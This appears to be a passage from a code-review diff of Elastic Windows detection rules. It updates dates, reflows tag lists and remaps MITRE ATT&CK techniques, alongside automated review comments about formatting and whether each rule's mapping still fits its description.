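Review bot: On the new side of this hunk the `T1112` technique table is inserted with no separator on either side: the removed blank line after the `T1053.002` reference is not re-added, so `reference = "https://attack.mitre.org/techniques/T1053/002/"` is immediately followed by `[[rule.threat.technique]]`, and `reference = "https://attack.mitre.org/techniques/T1112/"` is immediately followed by `[rule.threat.tactic]`. Every other threat hunk in this commit normalizes toward one blank line between tables (the regmod_remotemonologue hunk is the only other one that is partially inconsistent), so this file will stand out and is likely to be rewritten by the formatter. Restoring the two blank lines keeps the file consistent with the rest of the change. Also worth a second look: the removed `T1562.001` Disable or Modify Tools mapping is replaced by T1112 only, so if enabling the AT protocol is meant to be read as weakening a control, that nuance is now gone from the threat block.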
@@ -58,20 +58,7 @@ This rule identifies file name patterns generated by the use of SDelete utility risk_score = 21 rule_id = "5aee924b-6ceb-4633-980e-1bde8cdb40c5" severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Tactic: Impact", - "Data Source: Elastic Endgame", - "Resources: Investigation Guide", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: SentinelOne", - "Data Source: Crowdstrike", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Endgame", "Resources: Investigation Guide", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Data Source: Crowdstrike"] timestamp_override = "event.ingested" type = "eql" @@ -82,31 +69,18 @@ file where host.os.type == "windows" and event.type == "change" and file.name : [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1070" name = "Indicator Removal" reference = "https://attack.mitre.org/techniques/T1070/" + [[rule.threat.technique.subtechnique]] id = "T1070.004" name = "File Deletion" reference = "https://attack.mitre.org/techniques/T1070/004/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1485" -name = "Data Destruction" -reference = "https://attack.mitre.org/techniques/T1485/" - - -[rule.threat.tactic] -id = "TA0040" -name = "Impact" -reference = "https://attack.mitre.org/tactics/TA0040/" - diff --git a/rules/windows/defense_evasion_solarwinds_backdoor_service_disabled_via_registry.toml b/rules/windows/defense_evasion_solarwinds_backdoor_service_disabled_via_registry.toml index 18215c26fe3..007beca6c09 100644 
--- a/rules/windows/defense_evasion_solarwinds_backdoor_service_disabled_via_registry.toml +++ b/rules/windows/defense_evasion_solarwinds_backdoor_service_disabled_via_registry.toml @@ -2,7 +2,7 @@ creation_date = "2020/12/14" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/08/26" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -64,20 +64,7 @@ references = [ risk_score = 47 rule_id = "b9960fef-82c6-4816-befa-44745030e917" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Tactic: Initial Access", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: SentinelOne", - "Data Source: Crowdstrike", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -99,6 +86,7 @@ registry where host.os.type == "windows" and event.type == "change" and registry [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1112" name = "Modify Registry" 
@@ -108,32 +96,13 @@ reference = "https://attack.mitre.org/techniques/T1112/" id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" + [[rule.threat.technique.subtechnique]] id = "T1562.001" name = "Disable or Modify Tools" reference = "https://attack.mitre.org/techniques/T1562/001/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1195" -name = "Supply Chain Compromise" -reference = "https://attack.mitre.org/techniques/T1195/" -[[rule.threat.technique.subtechnique]] -id = "T1195.002" -name = "Compromise Software Supply Chain" -reference = "https://attack.mitre.org/techniques/T1195/002/" - - - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" - diff --git a/rules/windows/defense_evasion_suspicious_certutil_commands.toml b/rules/windows/defense_evasion_suspicious_certutil_commands.toml index d31877d1658..fb5d81c08d8 100644 --- a/rules/windows/defense_evasion_suspicious_certutil_commands.toml +++ b/rules/windows/defense_evasion_suspicious_certutil_commands.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [transform] [[transform.osquery]] 
@@ -112,20 +112,7 @@ references = [ risk_score = 47 rule_id = "fd70c98a-c410-42dc-a2e3-761c71848acf" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Data Source: Elastic Endgame", - "Resources: Investigation Guide", - "Data Source: Elastic Defend", - "Data Source: Windows Security Event Logs", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: Sysmon", - "Data Source: SentinelOne", - "Data Source: Crowdstrike", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Credential Access", "Tactic: Defense Evasion", "Data Source: Elastic Endgame", "Resources: Investigation Guide", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike"] timeline_id = "e70679c2-6cde-4510-9764-4823df18f7db" timeline_title = "Comprehensive Process Timeline" timestamp_override = "event.ingested" 
@@ -140,14 +127,39 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1105" +name = "Ingress Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1105/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1649" +name = "Steal or Forge Authentication Certificates" +reference = "https://attack.mitre.org/techniques/T1649/" + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1140" name = "Deobfuscate/Decode Files or Information" reference = "https://attack.mitre.org/techniques/T1140/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/defense_evasion_suspicious_execution_from_mounted_device.toml b/rules/windows/defense_evasion_suspicious_execution_from_mounted_device.toml index cf9205c5fcc..219ae03cc8f 100644 --- a/rules/windows/defense_evasion_suspicious_execution_from_mounted_device.toml +++ b/rules/windows/defense_evasion_suspicious_execution_from_mounted_device.toml @@ -2,7 +2,7 @@ creation_date = "2021/05/28" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2026/02/23" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -86,15 +86,32 @@ process where host.os.type == "windows" and event.type == "start" and process.ex [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1127" +name = "Trusted Developer Utilities Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1127/" + +[[rule.threat.technique.subtechnique]] +id = "T1127.001" +name = "MSBuild" +reference = "https://attack.mitre.org/techniques/T1127/001/" + [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" + [[rule.threat.technique.subtechnique]] id = "T1218.005" name = "Mshta" reference = "https://attack.mitre.org/techniques/T1218/005/" +[[rule.threat.technique.subtechnique]] +id = "T1218.007" +name = "Msiexec" +reference = "https://attack.mitre.org/techniques/T1218/007/" + [[rule.threat.technique.subtechnique]] id = "T1218.010" name = "Regsvr32" @@ -105,18 +122,19 @@ id = "T1218.011" name = "Rundll32" reference = "https://attack.mitre.org/techniques/T1218/011/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" @@ -127,10 +145,7 @@ id = "T1059.003" name = "Windows Command Shell" reference = "https://attack.mitre.org/techniques/T1059/003/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml b/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml index 30a19f5a7ff..74f123093a7 100644 --- a/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml 
+++ b/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/21" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -64,19 +64,7 @@ references = [ risk_score = 73 rule_id = "acf738b5-b5b2-4acc-bad9-1e18ee234f40" severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: SentinelOne", - "Data Source: Elastic Endgame", - "Data Source: Crowdstrike", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Data Source: Elastic Endgame", "Data Source: Crowdstrike", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" 
@@ -95,14 +83,51 @@ file where host.os.type == "windows" and event.type != "deletion" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1055" -name = "Process Injection" -reference = "https://attack.mitre.org/techniques/T1055/" +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.003" +name = "CMSTP" +reference = "https://attack.mitre.org/techniques/T1218/003/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.005" +name = "Mshta" +reference = "https://attack.mitre.org/techniques/T1218/005/" +[[rule.threat.technique.subtechnique]] +id = "T1218.010" +name = "Regsvr32" +reference = "https://attack.mitre.org/techniques/T1218/010/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1047" +name = "Windows Management Instrumentation" +reference = "https://attack.mitre.org/techniques/T1047/" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique]] +id = "T1129" +name = "Shared Modules" +reference = "https://attack.mitre.org/techniques/T1129/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/windows/defense_evasion_suspicious_process_access_direct_syscall.toml b/rules/windows/defense_evasion_suspicious_process_access_direct_syscall.toml index 3c06a0f9e98..4261e75d036 100644 --- a/rules/windows/defense_evasion_suspicious_process_access_direct_syscall.toml +++ b/rules/windows/defense_evasion_suspicious_process_access_direct_syscall.toml 
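Review bot: The added `[[rule.threat.technique.subtechnique]]` table for T1218.010, the `[rule.threat.tactic]` table that follows it and the second `[[rule.threat]]` entry are inserted without the blank-line separators that the same hunk adds before every other table, so the section mixes two layouts. The same uneven spacing appears in the zoom child-process, system-critical-process, untrusted-driver and unusual-process-network-connection hunks. If the rule files are normalised by a formatter before release, regenerating these files through it would make the layout uniform; otherwise a blank line before each table header is the convention the rest of the hunk follows.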
@@ -2,7 +2,7 @@ creation_date = "2021/10/11" integration = ["windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [transform] [[transform.osquery]] @@ -111,15 +111,7 @@ Hence for this rule to work effectively, users will need to add a custom ingest For more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html """ severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Tactic: Execution", - "Resources: Investigation Guide", - "Data Source: Sysmon", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Resources: Investigation Guide", "Data Source: Sysmon"] timestamp_override = "event.ingested" type = "eql" @@ -149,26 +141,13 @@ process where host.os.type == "windows" and event.code == "10" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1055" -name = "Process Injection" -reference = "https://attack.mitre.org/techniques/T1055/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1106" name = "Native API" reference = "https://attack.mitre.org/techniques/T1106/" - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/windows/defense_evasion_suspicious_scrobj_load.toml b/rules/windows/defense_evasion_suspicious_scrobj_load.toml index 8b30df05e2c..0a146be32cf 100644 --- a/rules/windows/defense_evasion_suspicious_scrobj_load.toml +++ b/rules/windows/defense_evasion_suspicious_scrobj_load.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/02" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
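Review bot: The `@@ -149,26 +141,13 @@` hunk removes the Defense Evasion tactic and T1055 entirely, leaving only T1106 under Execution, while the file keeps its `defense_evasion_` name and its `event.code == "10"` (process access) query context, so the rule's location and mapping no longer agree. Whether T1055 belongs here depends on the description and query, which lie outside the hunk, but the preceding tags hunk also drops `Tactic: Defense Evasion`, so the removal looks deliberate and deserves a sentence in the PR description or a file rename. The same pattern (Defense Evasion dropped from a `defense_evasion_`-prefixed rule) recurs in the zoom child-process and WSL bash hunks.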
@@ -94,19 +94,13 @@ any where host.os.type == "windows" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" -[[rule.threat.technique.subtechnique]] -id = "T1218.010" -name = "Regsvr32" -reference = "https://attack.mitre.org/techniques/T1218/010/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/defense_evasion_suspicious_wmi_script.toml b/rules/windows/defense_evasion_suspicious_wmi_script.toml index 45706563ed1..a429935529b 100644 --- a/rules/windows/defense_evasion_suspicious_wmi_script.toml +++ b/rules/windows/defense_evasion_suspicious_wmi_script.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/02" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -58,16 +58,7 @@ Windows Management Instrumentation Command-line (WMIC) is a powerful tool for ma risk_score = 47 rule_id = "7f370d54-c0eb-4270-ac5a-9a6020585dc6" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Tactic: Execution", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Defend", "Data Source: Sysmon", "Resources: Investigation Guide"] type = "eql" query = ''' 
@@ -83,26 +74,13 @@ sequence by process.entity_id with maxspan = 2m [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1220" name = "XSL Script Processing" reference = "https://attack.mitre.org/techniques/T1220/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1047" -name = "Windows Management Instrumentation" -reference = "https://attack.mitre.org/techniques/T1047/" - - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/windows/defense_evasion_suspicious_zoom_child_process.toml b/rules/windows/defense_evasion_suspicious_zoom_child_process.toml index 2b461a36b16..ed4551b154d 100644 --- a/rules/windows/defense_evasion_suspicious_zoom_child_process.toml +++ b/rules/windows/defense_evasion_suspicious_zoom_child_process.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/03" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender", "system", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [transform] [[transform.osquery]] 
@@ -105,21 +105,7 @@ This rule identifies a potential malicious process masquerading as `Zoom.exe` or risk_score = 47 rule_id = "97aba1ef-6034-4bd3-8c1a-1e0996b27afa" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Tactic: Execution", - "Data Source: Elastic Endgame", - "Resources: Investigation Guide", - "Data Source: Elastic Defend", - "Data Source: SentinelOne", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: Windows Security Event Logs", - "Data Source: Crowdstrike", - "Data Source: Sysmon", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Data Source: Elastic Endgame", "Resources: Investigation Guide", "Data Source: Elastic Defend", "Data Source: SentinelOne", "Data Source: Microsoft Defender for Endpoint", "Data Source: Windows Security Event Logs", "Data Source: Crowdstrike", "Data Source: Sysmon"] timestamp_override = "event.ingested" type = "eql" 
@@ -131,31 +117,23 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1036" -name = "Masquerading" -reference = "https://attack.mitre.org/techniques/T1036/" [[rule.threat.technique]] -id = "T1055" -name = "Process Injection" -reference = "https://attack.mitre.org/techniques/T1055/" +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.001" +name = "PowerShell" +reference = "https://attack.mitre.org/techniques/T1059/001/" -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1203" -name = "Exploitation for Client Execution" -reference = "https://attack.mitre.org/techniques/T1203/" - +[[rule.threat.technique.subtechnique]] +id = "T1059.003" +name = "Windows Command Shell" +reference = "https://attack.mitre.org/techniques/T1059/003/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/windows/defense_evasion_system_critical_proc_abnormal_file_activity.toml b/rules/windows/defense_evasion_system_critical_proc_abnormal_file_activity.toml index 5c5acb3734e..c61e96383d9 100644 --- a/rules/windows/defense_evasion_system_critical_proc_abnormal_file_activity.toml +++ b/rules/windows/defense_evasion_system_critical_proc_abnormal_file_activity.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/19" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/08/26" +updated_date = "2026/03/23" [transform] [[transform.osquery]] 
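Review bot: The preceding tags hunk's header quotes the description as "a potential malicious process masquerading as `Zoom.exe`", yet this hunk removes the T1036 Masquerading technique together with the Defense Evasion tactic, so the description now names a behaviour the threat mapping no longer records. If masquerading is still what the query detects, keep a `[[rule.threat]]` entry with `id = "T1036"` under TA0005 and restore the `Tactic: Defense Evasion` tag the tags hunk dropped; if the rule has been re-scoped to scripting-interpreter child processes, the description should be updated to match.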
@@ -102,20 +102,7 @@ This rule looks for the creation of executable files done by system-critical pro risk_score = 73 rule_id = "e94262f2-c1e9-4d3f-a907-aeab16712e1a" severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Tactic: Execution", - "Resources: Investigation Guide", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: SentinelOne", - "Data Source: Crowdstrike", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Privilege Escalation", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Data Source: Crowdstrike"] timestamp_override = "event.ingested" type = "eql" 
@@ -136,26 +123,26 @@ file where host.os.type == "windows" and event.type != "deletion" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1211" -name = "Exploitation for Defense Evasion" -reference = "https://attack.mitre.org/techniques/T1211/" +[[rule.threat.technique]] +id = "T1055" +name = "Process Injection" +reference = "https://attack.mitre.org/techniques/T1055/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1203" -name = "Exploitation for Client Execution" -reference = "https://attack.mitre.org/techniques/T1203/" +[[rule.threat.technique]] +id = "T1055" +name = "Process Injection" +reference = "https://attack.mitre.org/techniques/T1055/" [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/windows/defense_evasion_unsigned_dll_loaded_from_suspdir.toml b/rules/windows/defense_evasion_unsigned_dll_loaded_from_suspdir.toml index 0828b1440b9..8202a95a100 100644 --- a/rules/windows/defense_evasion_unsigned_dll_loaded_from_suspdir.toml +++ b/rules/windows/defense_evasion_unsigned_dll_loaded_from_suspdir.toml @@ -2,7 +2,7 @@ creation_date = "2022/11/22" integration = ["endpoint"] maturity = "production" -updated_date = "2026/01/21" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -165,29 +165,18 @@ library where host.os.type == "windows" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1036" -name = "Masquerading" -reference = "https://attack.mitre.org/techniques/T1036/" -[[rule.threat.technique.subtechnique]] -id = "T1036.001" -name = "Invalid Code Signature" -reference = "https://attack.mitre.org/techniques/T1036/001/" - [[rule.threat.technique]] id = "T1574" name = "Hijack Execution Flow" reference = "https://attack.mitre.org/techniques/T1574/" + [[rule.threat.technique.subtechnique]] id = "T1574.001" name = "DLL" reference = "https://attack.mitre.org/techniques/T1574/001/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/defense_evasion_untrusted_driver_loaded.toml b/rules/windows/defense_evasion_untrusted_driver_loaded.toml index c9a0df30ca0..3d950d40f57 100644 --- a/rules/windows/defense_evasion_untrusted_driver_loaded.toml +++ b/rules/windows/defense_evasion_untrusted_driver_loaded.toml @@ -2,7 +2,7 @@ creation_date = "2023/01/27" integration = ["endpoint"] maturity = "production" -updated_date = "2025/09/04" +updated_date = "2026/03/23" [transform] [[transform.osquery]] 
@@ -119,19 +119,18 @@ driver where host.os.type == "windows" and process.pid == 4 and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1036" -name = "Masquerading" -reference = "https://attack.mitre.org/techniques/T1036/" -[[rule.threat.technique.subtechnique]] -id = "T1036.001" -name = "Invalid Code Signature" -reference = "https://attack.mitre.org/techniques/T1036/001/" +[[rule.threat.technique]] +id = "T1553" +name = "Subvert Trust Controls" +reference = "https://attack.mitre.org/techniques/T1553/" +[[rule.threat.technique.subtechnique]] +id = "T1553.006" +name = "Code Signing Policy Modification" +reference = "https://attack.mitre.org/techniques/T1553/006/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/defense_evasion_unusual_network_connection_via_dllhost.toml b/rules/windows/defense_evasion_unusual_network_connection_via_dllhost.toml index ef3d4c6c627..0ad876a1e83 100644 --- a/rules/windows/defense_evasion_unusual_network_connection_via_dllhost.toml +++ b/rules/windows/defense_evasion_unusual_network_connection_via_dllhost.toml @@ -2,7 +2,7 @@ creation_date = "2021/05/28" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/08/28" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -62,16 +62,7 @@ references = [ risk_score = 47 rule_id = "c7894234-7814-44c2-92a9-f7d851ea246a" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Resources: Investigation Guide", - "Data Source: SentinelOne", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Defense Evasion", "Data Source: Elastic Defend", "Data Source: Sysmon", "Resources: Investigation Guide", "Data Source: SentinelOne"] type = "eql" query = ''' @@ -88,14 +79,26 @@ sequence by host.id, process.entity_id with maxspan=1m [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/defense_evasion_unusual_network_connection_via_rundll32.toml b/rules/windows/defense_evasion_unusual_network_connection_via_rundll32.toml index f2db06b1ae8..73a80fd10f8 100644 --- a/rules/windows/defense_evasion_unusual_network_connection_via_rundll32.toml +++ b/rules/windows/defense_evasion_unusual_network_connection_via_rundll32.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/08/28" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -93,36 +93,31 @@ sequence by host.id, process.entity_id with maxspan=1m [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" + [[rule.threat.technique.subtechnique]] id = "T1218.011" name = "Rundll32" reference = "https://attack.mitre.org/techniques/T1218/011/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1071" -name = "Application Layer Protocol" -reference = "https://attack.mitre.org/techniques/T1071/" -[[rule.threat.technique.subtechnique]] -id = "T1071.001" -name = "Web Protocols" -reference = "https://attack.mitre.org/techniques/T1071/001/" - - - -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" - diff --git a/rules/windows/defense_evasion_unusual_process_network_connection.toml b/rules/windows/defense_evasion_unusual_process_network_connection.toml index 8dd19e5c315..89a760e9d11 100644 --- a/rules/windows/defense_evasion_unusual_process_network_connection.toml +++ b/rules/windows/defense_evasion_unusual_process_network_connection.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/08/26" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
